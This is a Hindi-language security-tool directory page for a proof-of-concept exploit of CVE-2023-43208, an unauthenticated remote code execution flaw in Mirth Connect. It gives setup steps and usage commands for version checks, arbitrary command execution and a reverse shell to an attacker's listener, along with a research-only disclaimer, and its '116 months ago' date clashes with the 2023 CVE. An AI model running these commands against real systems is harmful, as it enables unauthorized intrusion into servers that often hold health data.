Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-43208-PoC — प्रूफ-ऑफ-कॉन्सेप्ट पायथन स्क्रिप्ट जो Mirth Connect में CVE‑2023‑43208 को प्रदर्शित करती है, तथा असुरक्षित इंस्टेंस पर संस्करण जाँच और कमांड निष्पादन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/criz117/cve-2023-43208-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcriz117/cve-2023-43208-poc

CVE-2023-43208-PoC

प्रूफ-ऑफ-कॉन्सेप्ट पायथन स्क्रिप्ट जो Mirth Connect में CVE‑2023‑43208 को प्रदर्शित करती है, तथा असुरक्षित इंस्टेंस पर संस्करण जाँच और कमांड निष्पादन की अनुमति देती है।

रिपॉजिटरी देखें
116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-43208 - Mirth Connect अनऑथेंटिकेटेड RCE

आवश्यकताएँ

  • Python 3.11 या उच्चतर (3.11, 3.12, 3.13 पर परीक्षण किया गया)

सेटअप

# एक साफ वर्चुअल वातावरण बनाएँ
python3 -m venv .venv
source .venv/bin/activate

# पिन की गई निर्भरताएँ स्थापित करें
pip install -r requirements.txt

उपयोग

# केवल संस्करण जाँचें
python3 CVE-2023-43208.py -u https://TARGET/ --check

# एकल कमांड निष्पादित करें
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"

# रिवर्स शेल (पहले nc लिसनर शुरू करें)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT

नोट्स

  • सर्वर से 500 प्रतिक्रिया सामान्य और अपेक्षित है — कमांड फिर भी निष्पादित होता है
  • Mirth Connect < 4.4.1 को प्रभावित करता है

अस्वीकरण

यह प्रूफ‑ऑफ‑कॉन्सेप्ट केवल अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इसे उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। इस कोड के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।

टूल डाउनलोड करें